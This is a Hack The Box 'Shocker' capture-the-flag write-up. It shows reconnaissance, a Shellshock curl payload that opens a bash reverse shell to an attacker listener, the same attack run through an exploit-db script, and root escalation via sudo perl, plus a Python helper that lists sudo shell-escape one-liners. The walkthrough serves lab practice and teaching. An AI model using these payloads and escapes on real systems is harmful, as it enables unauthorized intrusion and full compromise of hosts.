HTB – Shocker

Today we are going to solve another CTF challenge, "Shocker", a lab presented by Hack The Box for online penetration-testing practice at various experience levels. HTB splits its labs into two groups, Active and Retired; since write-ups of Active labs may not be published, we have chosen the retired Shocker lab.

Level: Beginners

Task: find user.txt and root.txt file in the victim’s machine.

Let's start with a basic nmap scan (default scripts plus version detection). Note that SSH is on the non-standard port 2222, so the only service exposed for initial access is Apache on port 80:

c:\Users\jacco>nmap -sC -sV 10.10.10.56
Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-27 22:03 W. Europe Summer Time
Nmap scan report for 10.10.10.56
Host is up (0.031s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
2222/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
| 256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_ 256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.04 seconds

Next, we use dirb on Kali to brute-force directories. It finds /cgi-bin/ (403: the listing is forbidden, but scripts inside it can still be executed by Apache's mod_cgi), index.html and server-status. Since /cgi-bin/ is where Apache runs CGI scripts, the second run brute-forces that directory for files with the .sh extension:

root@kali:~/htb/shocker# dirb http://10.10.10.56
-----------------
DIRB v2.22 
By The Dark Raver
-----------------
START_TIME: Tue May 28 12:56:05 2019
URL_BASE: http://10.10.10.56/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://10.10.10.56/ ----
+ http://10.10.10.56/cgi-bin/ (CODE:403|SIZE:294) 
+ http://10.10.10.56/index.html (CODE:200|SIZE:137) 
+ http://10.10.10.56/server-status (CODE:403|SIZE:299) 
-----------------
END_TIME: Tue May 28 12:58:24 2019
DOWNLOADED: 4612 - FOUND: 3

root@kali:~/htb/shocker# dirb http://10.10.10.56/cgi-bin -X .sh
-----------------
DIRB v2.22 
By The Dark Raver
-----------------
START_TIME: Tue May 28 13:02:27 2019
URL_BASE: http://10.10.10.56/cgi-bin/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
EXTENSIONS_LIST: (.sh) | (.sh) [NUM = 1]
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://10.10.10.56/cgi-bin/ ----
+ http://10.10.10.56/cgi-bin/user.sh (CODE:200|SIZE:118) 
-----------------
END_TIME: Tue May 28 13:04:47 2019
DOWNLOADED: 4612 - FOUND: 1
root@kali:~/htb/shocker# curl http://10.10.10.56/cgi-bin/user.sh
Content-Type: text/plain

Just an uptime test script

15:57:06 up 6:12, 0 users, load average: 0.00, 0.00, 0.00

user.sh is a bash CGI script, which is exactly the setup Shellshock (CVE-2014-6271) needs: Apache's mod_cgi copies every request header into the script's environment (User-Agent becomes HTTP_USER_AGENT), and a vulnerable bash treats any environment value that begins with "() {" as a function definition, executing whatever follows the closing brace as soon as it starts. I looked across the internet for the string that triggers the bug and put together a reverse shell payload.

The command I used looked like this:

root@kali:~/htb/shocker# curl -H "user-agent: () { :; }; echo; echo; /bin/bash -i >& /dev/tcp/10.10.14.14/443 0>&1 " http://10.10.10.56:80/cgi-bin/user.sh
The two echoes emit an empty CGI header block and the blank line that terminates it, so Apache does not reject the script's output as a malformed header; bash then opens a TCP connection to my netcat listener on 10.10.14.14:443 through its /dev/tcp built-in, with stdin, stdout and stderr attached to the socket. The curl request hangs while the shell is connected, and the listener receives:
root@kali:~/htb/shocker# nc -lvp 443
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::443
Ncat: Listening on 0.0.0.0:443
Ncat: Connection from 10.10.10.56.
Ncat: Connection from 10.10.10.56:39634.
bash: no job control in this shell
shelly@Shocker:/usr/lib/cgi-bin$ id
id
uid=1000(shelly) gid=1000(shelly) groups=1000(shelly),4(adm),24(cdrom),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)

Alternatively, the same bug can be exploited with the Python script from https://www.exploit-db.com/exploits/34900, which starts the listener and sends the payload for us:
root@kali:~/htb/shocker# ./shellshock.py payload=reverse rhost=10.10.10.56 lhost=10.10.14.3 lport=443 pages=/cgi-bin/user.sh
[!] Started reverse shell handler
[-] Trying exploit on : /cgi-bin/user.sh
[!] Successfully exploited
[!] Incoming connection from 10.10.10.56
10.10.10.56> id
uid=1000(shelly) gid=1000(shelly) groups=1000(shelly),4(adm),24(cdrom),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)

10.10.10.56> ls 
user.sh

10.10.10.56> cd /home
10.10.10.56> ls
shelly

10.10.10.56> cd shelly
10.10.10.56> cat user.txt
2ec*****233

10.10.10.56> sudo -l
Matching Defaults entries for shelly on Shocker:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User shelly may run the following commands on Shocker:
(root) NOPASSWD: /usr/bin/perl

sudo -l shows that shelly may run /usr/bin/perl as root without a password. A root-run interpreter is as good as a root shell, because perl can exec any program:

10.10.10.56> sudo /usr/bin/perl -e 'exec "/bin/sh"'
10.10.10.56> id
uid=0(root) gid=0(root) groups=0(root)

10.10.10.56> cat /root/root.txt
52c*****a467
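
The privilege escalation above comes down to one check: does any sudo rule grant an interpreter or other shell-capable binary? The following is an added example, not from the original writeup, that parses `sudo -l` output and flags such rules. SAMPLE_SUDO_L mirrors the session in the post plus one constructed, harmless extra rule for contrast; SHELL_CAPABLE is an illustrative subset of GTFOBins-style escapes, not a complete catalogue.

```python
import re

# Added example, not from the original writeup. It parses `sudo -l` output and
# flags commands that can spawn a shell, the check that turns the writeup's
# "(root) NOPASSWD: /usr/bin/perl" into a root shell. SAMPLE_SUDO_L mirrors the
# session in the post with one constructed, harmless extra rule for contrast;
# SHELL_CAPABLE is an illustrative subset of GTFOBins-style escapes, not a
# complete catalogue.

SAMPLE_SUDO_L = r"""Matching Defaults entries for shelly on Shocker:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User shelly may run the following commands on Shocker:
    (root) NOPASSWD: /usr/bin/perl
    (root) /bin/ls /var/log
"""

# binary name -> how it is typically used to get a shell
SHELL_CAPABLE = {
    "perl": "sudo perl -e 'exec \"/bin/sh\"'",
    "python": "sudo python -c 'import os; os.execl(\"/bin/sh\", \"sh\")'",
    "python3": "sudo python3 -c 'import os; os.execl(\"/bin/sh\", \"sh\")'",
    "ruby": "sudo ruby -e 'exec \"/bin/sh\"'",
    "awk": "sudo awk 'BEGIN {system(\"/bin/sh\")}'",
    "find": "sudo find . -exec /bin/sh \\; -quit",
    "vim": "sudo vim -c ':!/bin/sh'",
    "less": "sudo less /etc/profile   then type  !/bin/sh",
    "env": "sudo env /bin/sh",
    "bash": "sudo bash",
    "sh": "sudo sh",
}

# "(root) NOPASSWD: /usr/bin/perl" -> runas="root" tags="NOPASSWD: " cmds="/usr/bin/perl"
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")


def parse_sudo_l(output):
    """Return (runas_user, nopasswd, command) triples from `sudo -l` text."""
    rules = []
    in_rules = False
    for line in output.splitlines():
        if line.startswith("User ") and "may run the following commands" in line:
            in_rules = True  # everything after this header is a rule line
            continue
        if not in_rules:
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        runas = m.group("runas").split(":")[0].strip()  # "(root)" or "(ALL : ALL)"
        nopasswd = "NOPASSWD" in m.group("tags")
        for cmd in m.group("cmds").split(","):
            cmd = cmd.strip()
            if cmd:
                rules.append((runas, nopasswd, cmd))
    return rules


def find_shell_escapes(output):
    """Rules whose command is ALL or a binary known to spawn a shell."""
    findings = []
    for runas, nopasswd, cmd in parse_sudo_l(output):
        name = cmd.split()[0].rsplit("/", 1)[-1]  # "/usr/bin/perl" -> "perl"
        if cmd == "ALL":
            escape = "sudo /bin/sh"
        elif name in SHELL_CAPABLE:
            escape = SHELL_CAPABLE[name]
        else:
            continue
        findings.append({"runas": runas, "nopasswd": nopasswd,
                         "command": cmd, "escape": escape})
    return findings


if __name__ == "__main__":
    for f in find_shell_escapes(SAMPLE_SUDO_L):
        flag = "NOPASSWD" if f["nopasswd"] else "password required"
        print(f"{f['command']} as {f['runas']} ({flag}): {f['escape']}")
```

Pipe real `sudo -l` output into `find_shell_escapes` and only the perl rule is reported for this box; the constructed `/bin/ls` rule is ignored because ls has no way to hand you a shell.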

Author: Jacco Straathof
